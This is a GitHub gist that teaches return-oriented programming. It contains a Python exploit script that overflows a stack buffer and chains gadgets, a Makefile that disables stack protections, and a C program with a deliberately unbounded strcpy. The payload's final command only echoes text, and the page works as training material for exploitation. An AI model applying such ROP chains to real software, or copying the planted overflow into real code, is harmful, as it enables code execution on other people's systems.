
mayanez/Makefile

Last active Oct 30, 2020
Simple ROP Exploit Example (x86)
# NOTE: For Python 2.7
import os
import struct
#Find gadgets
pop_ret = 0x08049ca5 # start address of a pop,ret sequence
pop_pop_ret = 0x08049ca4 # start address of a pop,pop,ret sequence
lazy = 0x08049b05 # objdump -d | grep lazy
food = 0x08049b30 # objdump -d | grep food
feeling_sick = 0x08049b92 # objdump -d | grep feeling_sick
#Buffer Overflow
payload = "A"*0x6c
payload += "BBBB"
#food(0xdeadbeef) gadget
payload += struct.pack("I", food)
payload += struct.pack("I", pop_ret)
payload += struct.pack("I", 0xdeadbeef)
#feeling_sick(0xd15ea5e, 0x0badf00d) gadget
payload += struct.pack("I", feeling_sick)
payload += struct.pack("I", pop_pop_ret)
payload += struct.pack("I", 0xd15ea5e)
payload += struct.pack("I", 0x0badf00d)
payload += struct.pack("I", lazy)
os.system("./simple-rop \"%s\"" % payload)
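# Build the deliberately vulnerable target.
#   -m32                 32-bit x86; the exploit packs 4-byte addresses
#   -O0 -g               keep the frame layout the exploit's 0x6c offset assumes
#   -static              statically linked, so gadget addresses do not depend on
#                        where libc is loaded
#   -no-pie              non-PIE executable: the hardcoded text addresses stay
#                        fixed under ASLR (stated explicitly rather than relying
#                        on -static implying it; needs gcc >= 6)
#   -fno-stack-protector no canary between buffer[] and the saved return address
simple-rop: simple-rop.c
	gcc -m32 -O0 -g -static -no-pie -fno-stack-protector $^ -o $@

.PHONY: clean
clean:
	rm -f simple-rop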
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
// Command buffer handed to system() by lazy(). food() and feeling_sick()
// strcat() fixed literals into it with no bounds check; the two appended
// pieces together are roughly 65 bytes, so they fit.
char string[100];
// I might need this later. ¯\_(ツ)_/¯
// I'm not using it so it shouldn't affect anything.
//
// Never called by main(); it is the ROP chain's final target. system() runs
// whatever food()/feeling_sick() have appended to the global buffer.
void lazy() {
    const char *cmd = string;
    system(cmd);
}
// Appends "/bin" to the global command buffer when called with the magic
// value; prints either way. The exploit reaches it with magic = 0xdeadbeef
// placed where the argument would be after a normal call.
void food(int magic) {
    printf("THANK YOU!\n");
    if (magic != 0xdeadbeef) {
        return;
    }
    strcat(string, "/bin");
}
// Appends the "/echo '...'" part of the command when both magic arguments
// match; together with food()'s "/bin" this forms the command lazy() runs.
void feeling_sick(int magic1, int magic2) {
    printf("1m f33ling s1cK...\n");
    if (magic1 != 0xd15ea5e || magic2 != 0x0badf00d) {
        return;
    }
    strcat(string, "/echo 'This message will self destruct in 30 seconds...BOOM!'");
}
// Intentionally vulnerable: strcpy() copies argv[1] into a 100-byte stack
// buffer with no length check, so a longer argument overwrites whatever the
// compiler placed above buffer[] — the saved EBP and vuln()'s return address.
// The exploit assumes the return address sits 0x6c + 4 bytes past the start
// of buffer[] (built with -O0 and -fno-stack-protector); any other layout
// needs the offset re-measured. The parameter `string` shadows the global
// `string` used by lazy()/food()/feeling_sick(); only the argument is read here.
void vuln(char *string) {
    char buffer[100] = {0};
    strcpy(buffer, string); // I don't know any better.
}
// Entry point: resets the global command buffer, then passes argv[1] (the
// attacker-controlled input) to vuln(). With no argument it only complains.
int main(int argc, char** argv) {
    string[0] = 0;
    printf("m3 hUN6rY...cAn 1 haZ 5H3ll?! f33d mE s0m3 beef\n\n");
    if (argc < 2) {
        printf("y0u f0rG0T t0 f33d mE!!!\n");
        return 0;
    }
    vuln(argv[1]);
    return 0;
}
@dilmailid dilmailid commented Jun 9, 2018

It created a segmentation fault. What do I have to change?


@mayanez mayanez commented Nov 14, 2018

You'll probably have to change the hardcoded addresses of the gadgets. They belong to the binary I compiled; after building with the Makefile, read the addresses of `food`, `feeling_sick`, `lazy` and the `pop; ret` / `pop; pop; ret` sequences from `objdump -d simple-rop` on your own build and put those in the script.

@EralpCelebi EralpCelebi commented Apr 9, 2019

Should I just set pop_ret to the start of the overflow? like the first appearence of "BBBB" or after it

@mayanez mayanez commented Apr 19, 2019

You should set pop_ret to the address of a `pop; ret` instruction sequence inside the program's code (found with `objdump -d` or a gadget finder), not to a position in the payload.
